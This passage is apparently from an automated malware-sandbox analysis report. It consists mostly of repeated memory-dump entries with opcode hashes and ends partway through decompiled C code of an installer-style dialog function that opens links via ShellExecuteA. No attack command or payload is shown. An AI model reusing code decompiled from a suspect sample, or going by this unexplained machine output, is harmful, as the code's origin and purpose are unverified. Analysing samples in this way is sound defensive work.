                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cc9bc6d8f9c2e418bd58db78698b7008309ffbab3428691d99d39d5cbf72628a
                                                                                                                                                                            • Instruction ID: 54e9138f2aa7945119b476296d8d7e4f88abbbfde0ccc3df567a9615706b74f0
                                                                                                                                                                            • Opcode Fuzzy Hash: cc9bc6d8f9c2e418bd58db78698b7008309ffbab3428691d99d39d5cbf72628a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7951AA6AE6F33284E7C3B07088D47E74D49DF5B182F518F6A8C66E1CA07B1F858E0185
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4d99a41925ce63412c034dec7efdffa85aa859a1e918c866207f7157f6c9ed22
                                                                                                                                                                            • Instruction ID: e140bf29022e15b502a436646014b63b387e05694eb2980efbe0756766d85726
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d99a41925ce63412c034dec7efdffa85aa859a1e918c866207f7157f6c9ed22
                                                                                                                                                                            • Instruction Fuzzy Hash: 48C155716043598FDF34CE29C9E43DA37A6EF96350F99823ECC5A8B655D331898ACB01
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: aef433abafbbbd3a68f7856ab20a4dced923e0023a703aec0493d4c76067ff97
                                                                                                                                                                            • Instruction ID: fc9d2a0adcb27dd5f0ac67cfeaf2cbb22c816ef85a5f98982a2560dc52c058b0
                                                                                                                                                                            • Opcode Fuzzy Hash: aef433abafbbbd3a68f7856ab20a4dced923e0023a703aec0493d4c76067ff97
                                                                                                                                                                            • Instruction Fuzzy Hash: AD61A966E2F73284EBC3A07089D07A74E49DF6B181F11CF6A8C67E1DA07B1F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fa94df686655186ab6b38123f5b129c7cb9684524f7969bcdf61639e6bb920c8
                                                                                                                                                                            • Instruction ID: 0fa9dedfdb10cfafa174bd9a907b9e32bf6b28f1ac7b3969b5d0b69058f9421f
                                                                                                                                                                            • Opcode Fuzzy Hash: fa94df686655186ab6b38123f5b129c7cb9684524f7969bcdf61639e6bb920c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CA14435A09317CBCF319E359A923C33BA39F92344F248565CC819B22AC7B0844797C3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d676f3ecdcf5756a79a109d15eea3aac88ce6ff95ccfcf4816dcb3883343d9f5
                                                                                                                                                                            • Instruction ID: 85b4b7538ad12d4b63f9e9a553407329a79027a60f8c883ea35dfe28890f5515
                                                                                                                                                                            • Opcode Fuzzy Hash: d676f3ecdcf5756a79a109d15eea3aac88ce6ff95ccfcf4816dcb3883343d9f5
                                                                                                                                                                            • Instruction Fuzzy Hash: A051AB66E6F73284E7C3A07489D07E74E49DF5B181F118F6A8C67E2DA07B1F858E0185
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dabe926390a9ce7f10b60636db951d04270dab505b288c2b228e292e08533c5b
                                                                                                                                                                            • Instruction ID: 648204e11c38f21971be6633d28edf50de2a0270402aca1b0ba3e7a89a7ec21f
                                                                                                                                                                            • Opcode Fuzzy Hash: dabe926390a9ce7f10b60636db951d04270dab505b288c2b228e292e08533c5b
                                                                                                                                                                            • Instruction Fuzzy Hash: 1761A866E2F73288EBC3B07089D07A74D49DF6B181F118F6A8C67E1D607B1F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 375390c875aaae51a5dcee9551c7c8c1b50c72ea4216603209d43a2086792aa4
                                                                                                                                                                            • Instruction ID: 9f69650fb988db7b9584dd6eb76316fe5b3c2e2246a897d75343882a2bbb9ebb
                                                                                                                                                                            • Opcode Fuzzy Hash: 375390c875aaae51a5dcee9551c7c8c1b50c72ea4216603209d43a2086792aa4
                                                                                                                                                                            • Instruction Fuzzy Hash: B671B966E2F73284E7C3A07089D07A74D49DF6B182F11CF6A8C27E1DA07B1F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d08bcdc18f6309ea3bcb94c9c5aad60971d1fea8b6cfda99ed9d6e7033fa19c0
                                                                                                                                                                            • Instruction ID: 53a3d34fc9ebb711a708e8aacd9660452493a68c36d02dcabe1e62a33180994d
                                                                                                                                                                            • Opcode Fuzzy Hash: d08bcdc18f6309ea3bcb94c9c5aad60971d1fea8b6cfda99ed9d6e7033fa19c0
                                                                                                                                                                            • Instruction Fuzzy Hash: F961DA66E2F73284E7C3A070C9D07A74E49DF1B181F118F6A8C67E2CA07B1F858E0595
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c7f77d885b7af33013556d9e95ec20693d63c8009c49676d03e8de0db7395d81
                                                                                                                                                                            • Instruction ID: f6c7d2c4a88533559413d8cb05bbc87424f1e1b8c6b5fd2c93f90cda9d9bf494
                                                                                                                                                                            • Opcode Fuzzy Hash: c7f77d885b7af33013556d9e95ec20693d63c8009c49676d03e8de0db7395d81
                                                                                                                                                                            • Instruction Fuzzy Hash: 5581B575F0934B8BCB30AE2499917C77B63AF85384FA58425DCC9AB219CB718D4397C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 488c8eca5b9de29039b0116cf82b30ea83729e477819a42dedc03779794eeb09
                                                                                                                                                                            • Instruction ID: cfd30f236edc201992a12e26d89670ebd0fbf42ecd7ca4ef9b3c9c519a7d948c
                                                                                                                                                                            • Opcode Fuzzy Hash: 488c8eca5b9de29039b0116cf82b30ea83729e477819a42dedc03779794eeb09
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F61BA66E2F73284E7C3A07089D07A74E49DF6B181F11CF6A8C67E2DA07B1F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d4e4e4b0229c06464a6596381c909e0ee847a8be3384f0c7709f0a680f0bbe58
                                                                                                                                                                            • Instruction ID: 044966172faf8bcb2635b7ba458c61600adc6b5a27df2c6ca96c0d347bbbd146
                                                                                                                                                                            • Opcode Fuzzy Hash: d4e4e4b0229c06464a6596381c909e0ee847a8be3384f0c7709f0a680f0bbe58
                                                                                                                                                                            • Instruction Fuzzy Hash: AF812B35A4071A8FDB309E788C953DA33E7AF95350FC5422DDC999B288D73185C68B06
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 94c0281ffe20785281a8cc63e49d61019ce87de4d1aced3d1b517a69de1328f2
                                                                                                                                                                            • Instruction ID: 2f1b4f960b621c74003284d4b935fddc2d033e6858a63880b2ad90e99700c453
                                                                                                                                                                            • Opcode Fuzzy Hash: 94c0281ffe20785281a8cc63e49d61019ce87de4d1aced3d1b517a69de1328f2
                                                                                                                                                                            • Instruction Fuzzy Hash: D671F235F053178BCF30AE3499963C77B979F95384F918529CC886B2A9C770898797C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c56a6205a78f1da49373d3fa97f97d5cdfcf7d2d46f366a64951ce2cbd7ae17
                                                                                                                                                                            • Instruction ID: 4591d29c851743b984dbd7a785f6cc01cc0e57a1e28ad44a6c7250071a1b00b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c56a6205a78f1da49373d3fa97f97d5cdfcf7d2d46f366a64951ce2cbd7ae17
                                                                                                                                                                            • Instruction Fuzzy Hash: 60512224F0A3538BCA34A9346A567D7BF535F85384F548829CCC56B26ACB71CC4797C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 88c1a4c49fdf2cc9b059035336c618be5a438503e539f42862670f84dc1dae77
                                                                                                                                                                            • Instruction ID: 79d59a90c21edffa5a0c92e167a619cd5048fcde3302b84987a02c2eefb993e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 88c1a4c49fdf2cc9b059035336c618be5a438503e539f42862670f84dc1dae77
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E41DF6AE6E33294E7D3B07089E13EB4D49CF17191F518B3A9C63A2DA07B1F844E0285
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7b4e18e82f374ff5ec2dde9e057d19962898840c29f8a179faef49e421ffe19d
                                                                                                                                                                            • Instruction ID: e355dfdeb69919c01abf32cda85fbaf9be0cb8742a5abf66a64aacc3674432d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b4e18e82f374ff5ec2dde9e057d19962898840c29f8a179faef49e421ffe19d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A516875B007478FDB249E398D643D633A2AFA67A0FC9422E8C49CB394D735C985C701
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e29a38d46737b47fcc231e75d1c3dd2ff864c914cffe39431a638e080c1aed99
                                                                                                                                                                            • Instruction ID: a64a2b738defb5b16b6780eba756624da2deb2a14a0d5a90a61f4b8defaab42e
                                                                                                                                                                            • Opcode Fuzzy Hash: e29a38d46737b47fcc231e75d1c3dd2ff864c914cffe39431a638e080c1aed99
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A41B424F0A313CB9A25753566527D7BB536F91388A61C839CCC5AB22ACBB0CC4767C3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d5a919438f4f1468e769d944f24f4e56d8e0d6fc5c209d9156c39e235d680e5
                                                                                                                                                                            • Instruction ID: 1180c1c16e7c477be1e9f021a53a354530a34e5f952e30bb83361b583f8b3da6
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d5a919438f4f1468e769d944f24f4e56d8e0d6fc5c209d9156c39e235d680e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F5125746043669FCB34EE788CA47EB7BA6AF85380F80442DDCC9CB254C7318981CB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: abe08ce9b6137dba914ab3c7478bf39224dabd8f52342cc6afbc6edc309e7e5a
                                                                                                                                                                            • Instruction ID: f3fbed9592eb78d9d57e1ea513f84f76325e351f4f8e67d898b1a6d1eea63d91
                                                                                                                                                                            • Opcode Fuzzy Hash: abe08ce9b6137dba914ab3c7478bf39224dabd8f52342cc6afbc6edc309e7e5a
                                                                                                                                                                            • Instruction Fuzzy Hash: BD514470A043659FCB34EE788C947EB7BA6AF85380F80842DDCCACB254C7318981CB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6a89d82c1de84ea6ab550705c63427b712957e310d06d40a4a64635fcb2167fe
                                                                                                                                                                            • Instruction ID: 3ad73aa9f19fd197ddc50f9bac59aa5a18252819b5b2624b7c1bdc1698e36a03
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a89d82c1de84ea6ab550705c63427b712957e310d06d40a4a64635fcb2167fe
                                                                                                                                                                            • Instruction Fuzzy Hash: D131E539B4535A8BDB20DF3888D43DB27E2AF27B90FC9456D9CC59B545E3214889C711
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 88f0f092c653cf14e7c51c75b19f59cece6b1e00eefa6f8b0e56c7e40b0ed1cc
                                                                                                                                                                            • Instruction ID: df3ebfa0703a39723a660736ec97fe9e72fab56b83d67b6935f0c4f68f34b9bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 88f0f092c653cf14e7c51c75b19f59cece6b1e00eefa6f8b0e56c7e40b0ed1cc
                                                                                                                                                                            • Instruction Fuzzy Hash: 801154396043168FD729AE3589617DBBBB3BF92240F81C82DCCC1C6529D330C98AC602
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d4a2ddefca14e88a682683e089789ab678de9dfa4db252b862de1203303d4a13
                                                                                                                                                                            • Instruction ID: a0ac6664a0311c595255e5fe3c921d645648482d99046e6df9a07da51b12c4be
                                                                                                                                                                            • Opcode Fuzzy Hash: d4a2ddefca14e88a682683e089789ab678de9dfa4db252b862de1203303d4a13
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CC09234211A40CFD741CE1CC8A0F8273A4BB02BA0FD24B80EA618BAA1D32CE9028E44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E00404027(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                                                            				char* _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				void* _v16;
                                                                                                                                                                            				struct HWND__* _t52;
                                                                                                                                                                            				long _t86;
                                                                                                                                                                            				int _t98;
                                                                                                                                                                            				struct HWND__* _t99;
                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				intOrPtr _t107;
                                                                                                                                                                            				intOrPtr _t109;
                                                                                                                                                                            				int _t110;
                                                                                                                                                                            				signed int* _t112;
                                                                                                                                                                            				signed int _t113;
                                                                                                                                                                            				char* _t114;
                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                            
                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                            					__eflags = _a8 - 0x111;
                                                                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                                                                            						L11:
                                                                                                                                                                            						__eflags = _a8 - 0x4e;
                                                                                                                                                                            						if(_a8 != 0x4e) {
                                                                                                                                                                            							__eflags = _a8 - 0x40b;
                                                                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                                                                            								 *0x41ecd4 =  *0x41ecd4 + 1;
                                                                                                                                                                            								__eflags =  *0x41ecd4;
                                                                                                                                                                            							}
                                                                                                                                                                            							L25:
                                                                                                                                                                            							_t110 = _a16;
                                                                                                                                                                            							L26:
                                                                                                                                                                            							return E00403F45(_a8, _a12, _t110);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                            						_t110 = _a16;
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                                                                                                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                                                                                                                                            							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                                                            								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                                                            								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                                                            								_v12 = _t100;
                                                                                                                                                                            								__eflags = _t100 - _t109 - 0x800;
                                                                                                                                                                            								_v16 = _t109;
                                                                                                                                                                            								_v8 = 0x4226a0;
                                                                                                                                                                            								if(_t100 - _t109 < 0x800) {
                                                                                                                                                                            									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                                                            									SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                            									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                                                                                                            									SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                                                            									_t110 = _a16;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                                                                                                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                                                                                                                                            							goto L26;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                                                                                                                                            							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                                                            								goto L26;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                                                                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                                                            								SendMessageA( *0x423708, 0x111, 1, 0);
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                                                                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                                                            								SendMessageA( *0x423708, 0x10, 0, 0);
                                                                                                                                                                            							}
                                                                                                                                                                            							return 1;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a12 >> 0x10;
                                                                                                                                                                            					if(_a12 >> 0x10 != 0) {
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *0x41ecd4; // 0x0
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t112 =  *0x41f4e0 + 0x14;
                                                                                                                                                                            					__eflags =  *_t112 & 0x00000020;
                                                                                                                                                                            					if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                            					__eflags = _t106;
                                                                                                                                                                            					 *_t112 = _t106;
                                                                                                                                                                            					E00403F00(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                            					E004042B1();
                                                                                                                                                                            					goto L11;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t98 = _a16;
                                                                                                                                                                            					_t113 =  *(_t98 + 0x30);
                                                                                                                                                                            					if(_t113 < 0) {
                                                                                                                                                                            						_t107 =  *0x422edc; // 0x70e974
                                                                                                                                                                            						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                                                            					}
                                                                                                                                                                            					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                                                            					_t114 = _t113 +  *0x423738;
                                                                                                                                                                            					_push(0x22);
                                                                                                                                                                            					_a16 =  *_t114;
                                                                                                                                                                            					_v12 = _v12 & 0x00000000;
                                                                                                                                                                            					_t115 = _t114 + 1;
                                                                                                                                                                            					_v16 = _t115;
                                                                                                                                                                            					_v8 = E00403FF2;
                                                                                                                                                                            					E00403EDE(_a4);
